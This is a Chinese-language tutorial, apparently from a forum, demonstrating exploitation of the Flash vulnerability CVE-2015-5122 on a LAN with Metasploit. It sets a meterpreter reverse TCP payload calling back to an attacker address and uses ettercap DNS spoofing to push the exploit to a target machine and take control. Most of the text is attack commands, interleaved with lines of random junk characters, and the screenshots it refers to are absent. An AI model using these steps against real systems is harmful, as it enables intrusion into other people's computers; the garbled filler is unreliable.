|
' C8 r- T4 M8 c7 _7 h& q& ?# d 二、cve2015-5122漏洞实例演示虚拟机 + I8 x; }6 p$ O _! V) }+ V
/ ?5 S7 n# H3 M
4 \% ^& {7 m! U 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: . C' u. F& ^ N9 X3 G! a
/ K- O; H# t; T& G/ I. G2 Y3 `, O% h( q9 h; k& y
search cve-2015-5122如图: ! d+ O2 Q6 ]! p% l
, K( K7 t# c- w& ?. V
. {6 M7 z* g/ o, u& [5 h* n. E
- t g' [3 E! p2 e N6 Y ^+ j" L) `
5 f. W# ~8 \, S. g n% \5 W9 K- P+ l3 O: R$ c- k
下面我们敲如下命令:
1 S3 n- @) l" k, B5 h 6 E" F1 N) w" O. H
# s, B& q+ D0 C; Y3 n use exploit/multi/browser/adobe_flash_opaque_background_uaf
+ @& S* ?, X |
# } s6 r% E3 c% ]3 F! F# N5 O8 d! j- u) i. d$ j
set PAYLOAD windows/meterpreter/reverse_tcp 2 a5 c) k, E+ g$ U7 _6 E- C
" p2 V$ l. y' s# t
) ~; m& i8 C) [$ K set LHOST 192.168.0.109 " X7 M7 y8 E+ i( z8 O: K
8 h4 \) ]; U4 A3 ~/ r `: _6 K8 l: `
set URIPATH / /*根目录*/
. M, [: s, S5 z \8 G' b* J ! U1 Q- L! v7 D
) M" p s3 k7 _7 I7 [+ z! ~% Z
set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 Y$ \8 T9 H9 z' J2 a& Y7 t( _
5 v# t3 A3 x# J+ t# g5 ~
1 F4 z9 L0 E! d# H( D set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 % c: x7 [' D0 l8 ~" T
( J9 |2 H- ~% N* {4 T
' m! h. ~5 N; F4 S$ e% i% [6 M 然后show options如图: 6 W. F; p' o0 W. E. ^1 [0 ^3 V
! ]- ?0 c8 N5 o5 k3 G; ~) X- g6 x1 T$ m+ {5 X
' ~2 K: a# H0 i4 D: A
9 A# f8 C0 R: P* S: v9 ?, E; E
! ~; R* z0 r x; [1 J E
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
$ i' S5 o8 f/ b
( C; D- V$ `- L 0 c0 t5 \% U7 m6 ]+ W" b6 V
" X S$ i6 ?8 z( p4 p2 S: W5 o 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115 3 V8 g" ^; p! r5 M
& r$ ~4 c$ e+ ~7 E9 ^# U9 I9 ~& V& Q4 q, d/ J* i; h
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf 9 z: j6 `1 f. A: q
6 r1 |; x9 X% m" H7 m
" H1 t9 ^ ~+ I; R7 {' F# x/ O0 @
! f3 D& H& F9 B4 i/ U+ ~6 J
0 `* c3 N) N9 s. D. w0 J0 n
+ g( i+ j1 R5 R) y 成功了,这时候我们断开ettercap,如图: % R- X* D$ V* {- ?4 [8 y
# m8 t6 Z [1 e$ `* Q/ S
7 `4 f& }; |+ [6 A( i) @
- b/ c, J2 u* N: E7 v, e6 P * y) H9 r& B+ f" K! s
7 d# T5 N% y x& A( C Screenshot如图:
. n0 ?2 h0 q* F" n! N: W9 p; Q) C3 { 1 B( I6 C. o* z. k* f1 D7 J
. W% ~3 o5 c" e( k9 d$ U
* O. t6 N% S# w2 F/ G9 z5 l
: @: `* c Y* S) e2 V' g2 U
7 j4 j6 S2 c% P- s) s ; l2 r: f, F4 @) N
|